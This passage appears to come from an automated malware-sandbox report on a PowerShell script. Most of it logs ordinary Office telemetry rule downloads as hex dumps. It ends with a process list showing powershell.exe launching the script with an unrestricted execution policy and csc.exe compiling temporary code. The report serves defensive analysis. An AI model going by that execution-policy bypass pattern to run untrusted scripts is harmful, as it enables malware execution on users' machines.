                                                                                                                            2024-11-29 07:31:36 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            141192.168.2.54986513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:36 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:37 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:37 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1415
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                            ETag: "0x8DC582BE7C66E85"
                                                                                                                            x-ms-request-id: 6c879dfa-801e-0035-6714-41752a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073137Z-174f78459688l8rvhC1EWRtzr00000000c3g000000009yhn
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:37 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            142192.168.2.54986413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:36 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:37 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:37 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1388
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                            ETag: "0x8DC582BDBD9126E"
                                                                                                                            x-ms-request-id: fc0d267c-101e-0079-0929-415913000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073137Z-174f7845968j6t2phC1EWRcfe80000000zt0000000004541
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:37 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            143192.168.2.54986613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:37 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:37 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:37 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1378
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                            ETag: "0x8DC582BDB813B3F"
                                                                                                                            x-ms-request-id: effa0956-a01e-0032-4c91-3f1949000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073137Z-174f7845968glpgnhC1EWR7uec0000000ztg0000000048mb
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:37 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            144192.168.2.54986713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:37 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:37 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:37 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1405
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                            ETag: "0x8DC582BE89A8F82"
                                                                                                                            x-ms-request-id: 9546ee6f-d01e-0014-4f91-3fed58000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073137Z-174f78459688l8rvhC1EWRtzr00000000c6g000000005p8r
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:37 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            145192.168.2.54986813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:38 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:39 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:38 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1368
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                            ETag: "0x8DC582BE51CE7B3"
                                                                                                                            x-ms-request-id: af0b01d9-401e-0035-6c5f-4082d8000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073138Z-174f7845968qj8jrhC1EWRh41s0000000zfg0000000098ps
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:39 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            146192.168.2.54986913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:39 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:39 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:39 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1415
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                            ETag: "0x8DC582BDCE9703A"
                                                                                                                            x-ms-request-id: 35d21284-b01e-001e-2c15-410214000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073139Z-174f7845968n2hr8hC1EWR9cag0000000z9g000000002xu4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:39 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            147192.168.2.54987013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:39 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:39 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:39 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1378
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                            ETag: "0x8DC582BE584C214"
                                                                                                                            x-ms-request-id: dbe9ef63-901e-005b-3a83-3f2005000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073139Z-174f7845968zgtf6hC1EWRqd8s0000000sg0000000008tru
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:39 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            148192.168.2.54987113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:39 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:39 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:39 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1407
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                            ETag: "0x8DC582BE687B46A"
                                                                                                                            x-ms-request-id: 0da30123-601e-0050-5915-412c9c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073139Z-174f7845968ljs8phC1EWRe6en0000000zk0000000000vqb
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:39 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            149192.168.2.54987213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:39 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:40 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:39 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1370
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                            ETag: "0x8DC582BDE62E0AB"
                                                                                                                            x-ms-request-id: f5b20bb7-801e-0078-5c14-41bac6000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073139Z-174f7845968nxc96hC1EWRspw80000000zc00000000051zp
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:40 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Click to jump to process

                                                                                                                            Target ID:0
                                                                                                                            Start time:02:30:17
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1"
                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:1
                                                                                                                            Start time:02:30:17
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:02:30:19
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline"
                                                                                                                            Imagebase:0x7ff7249b0000
                                                                                                                            File size:2'759'232 bytes
                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
